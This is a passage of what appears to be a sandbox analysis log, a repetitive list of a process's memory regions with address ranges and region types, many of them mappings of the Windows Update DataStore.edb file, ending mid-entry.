Region: id = 3346 start_va = 0x1e40000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3347 start_va = 0x1e40000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 3348 start_va = 0x1e80000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3349 start_va = 0xfa0000 end_va = 0xfa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 3350 start_va = 0x1e40000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3351 start_va = 0x1e40000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 3352 start_va = 0x1e80000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3353 start_va = 0x5230000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 3354 start_va = 0x5230000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005230000" filename = "" Region: id = 3355 start_va = 0x10b0000 end_va = 0x10b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 3356 start_va = 0x1e40000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3357 start_va = 0x1e40000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 3358 start_va = 0x1e80000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3359 start_va = 0x10b0000 end_va = 0x10b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 3360 start_va = 0x10c0000 end_va = 0x10c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 3361 start_va = 0x1e40000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3362 start_va = 0x1e40000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 3363 start_va = 0x1e80000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3364 start_va = 0x5230000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 3365 start_va = 0x5230000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005230000" filename = "" Region: id = 3366 start_va = 0x10c0000 end_va = 0x10c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 3367 start_va = 0x1e40000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3368 start_va = 0x1e40000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 3369 start_va = 0x1e80000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3370 start_va = 0x10b0000 end_va = 0x10bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 3371 start_va = 0x10c0000 end_va = 0x10c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 3372 start_va = 0x10d0000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 3373 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3374 start_va = 0x1170000 end_va = 0x1177fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 3375 start_va = 0x1180000 end_va = 0x1187fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 3376 start_va = 0x1190000 end_va = 0x1197fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 3377 start_va = 0x1280000 end_va = 0x1281fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 3378 start_va = 0x1280000 end_va = 0x1287fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 3379 start_va = 0x1170000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 3380 start_va = 0x1170000 end_va = 0x1177fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 3381 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3382 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3383 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3384 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3385 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3386 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3387 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3388 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3389 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3390 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3391 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3392 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3393 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3394 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3395 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3396 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3397 start_va = 0x38c0000 end_va = 0x393ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 3398 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 3399 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3400 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3401 start_va = 0x1190000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 3402 start_va = 0x1390000 end_va = 0x139ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 3403 start_va = 0x13a0000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 3404 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3405 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3406 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3407 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3408 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3409 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3410 start_va = 0x1590000 end_va = 0x1597fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 3411 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3412 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3413 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3414 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3415 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3416 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3417 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3418 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3419 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3420 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3421 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3422 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3423 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3424 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3425 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3426 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3427 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3428 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3429 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3430 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3431 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3432 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3433 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3434 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3435 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3436 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3437 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3438 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3439 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3440 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3441 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3442 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3443 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3444 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3445 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3446 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3447 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3448 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3449 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3450 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3451 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3452 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3453 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3454 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3455 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3456 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3457 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3458 start_va = 0x15a0000 end_va = 0x15affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 3459 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3460 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3461 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3462 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3463 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3464 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3465 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3466 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3467 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3468 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3469 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3470 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3471 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3472 start_va = 0x1170000 end_va = 0x117ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3473 start_va = 0x1180000 end_va = 0x118ffff monitored = 0 entry_point = 0x0 region_type = 